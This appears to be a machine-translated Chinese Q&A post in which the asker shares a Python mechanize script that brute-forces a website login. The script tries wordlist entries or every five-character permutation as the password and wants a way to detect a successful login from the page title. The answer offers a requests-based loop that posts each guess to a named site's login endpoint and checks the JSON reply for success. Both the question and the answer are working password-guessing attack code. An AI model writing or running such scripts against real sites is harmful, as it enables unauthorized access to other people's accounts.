所以,我有这个强制执行的脚本,基本上是暴力强制Web表单。假设我的示例网站的网络表单在成功登录后重定向到相同的URL。例如,要登录我必须访问此站点:https://example.com/account/,当我输入错误的用户名/密码时,它不会更改页面的URL。一切都保持不变。如果我输入正确的用户名&密码,它会更改页面标题,但URL仍然保持不变。
我想改变:response.geturl() --> response.gettitle()但我不确定这是什么正确属性。
我的代码:
#!/usr/bin/python
import mechanize
import itertools
import sys
import os
br = mechanize.Browser()
br.set_handle_equiv(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
ua = 'Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 (compatible;)'
br.addheaders = [('User-Agent', ua), ('Accept', '*/*')]
if len(sys.argv) > 1:
if os.path.exists(sys.argv[1]):
combos = [line.strip() for line in open(sys.argv[1])]
else:
print "[-] File not found"
sys.exit()
else:
combos = itertools.permutations("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789",5)
r = br.open("https://example.com/account/")
for x in combos:
br.select_form(nr = 0)
br.form['login'] = "my_username"
br.form['pass'] = ''.join(x)
print "\033[1;33;48mChecking:"+"\033[1;34;48m",br.form['pass']
response = br.submit()
if response.geturl()=="https://example.com/account/":
#if response.gettitle()==...
print ""
print "\033[1;32;48mPassword found:"+"\033[1;36;48m",''.join(x)
break
答案 0 :(得分:1)
请求非常简单:
import requests
data ={"login":"yourlogin",
"pass": "yourpass"}
r = requests.post("https://bagar.io/engine/modules/login.php", data=data)
print("success" in r.json())
成功登录会返回{u'success': u'allow'}并返回失败{u'error':lot of unicode...}。
所以请继续传递登录数据:
for x in combos:
data = {"login":"my_username",
"pass":"".join(x)}
r = requests.post("https://bagar.io/engine/modules/login.php", data=data)
print("success" in r.json())